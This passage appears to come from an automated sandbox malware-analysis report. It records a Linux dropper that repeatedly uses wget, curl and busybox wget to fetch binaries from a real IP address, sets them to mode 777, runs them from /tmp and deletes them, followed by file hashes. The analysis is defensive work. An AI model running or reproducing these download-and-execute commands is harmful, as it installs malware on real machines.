/usr/bin/curlcurl -O http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- Writes file to tmp directory
PID:1625 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:1626
-
/bin/chmodchmod 777 LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- File and Directory Permissions Modification
PID:1627 -
/tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo./LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- Executes dropped EXE
PID:1628 -
/bin/rmrm LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:1629
-
/usr/bin/wgetwget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:1630
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- Writes file to tmp directory
PID:1631 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:1632
-
/bin/chmodchmod 777 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- File and Directory Permissions Modification
PID:1633 -
/tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ./8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- Executes dropped EXE
PID:1634 -
/bin/rmrm 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:1635
-
/usr/bin/wgetwget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:1636
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- Writes file to tmp directory
PID:1637 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:1638
-
/bin/chmodchmod 777 pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- File and Directory Permissions Modification
PID:1639 -
/tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK./pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- Executes dropped EXE
PID:1640 -
/bin/rmrm pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:1641
-
/usr/bin/wgetwget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:1642
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- Writes file to tmp directory
PID:1643 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:1644
-
/bin/chmodchmod 777 BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- File and Directory Permissions Modification
PID:1645 -
/tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5./BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- Executes dropped EXE
PID:1646 -
/bin/rmrm BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:1647
-
/usr/bin/wgetwget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:1648
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- Writes file to tmp directory
PID:1649 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:1650
-
/bin/chmodchmod 777 SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- File and Directory Permissions Modification
PID:1651 -
/tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay./SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- Executes dropped EXE
PID:1652 -
/bin/rmrm SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:1653
-
/usr/bin/wgetwget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:1654
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- Writes file to tmp directory
PID:1655 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:1656
-
/bin/chmodchmod 777 FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- File and Directory Permissions Modification
PID:1657 -
/tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f./FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- Executes dropped EXE
PID:1658 -
/bin/rmrm FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:1659
-
/usr/bin/wgetwget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:1660
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- Writes file to tmp directory
PID:1661 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:1662
-
/bin/chmodchmod 777 F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- File and Directory Permissions Modification
PID:1663 -
/tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg./F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- Executes dropped EXE
PID:1664 -
/bin/rmrm F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:1665
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97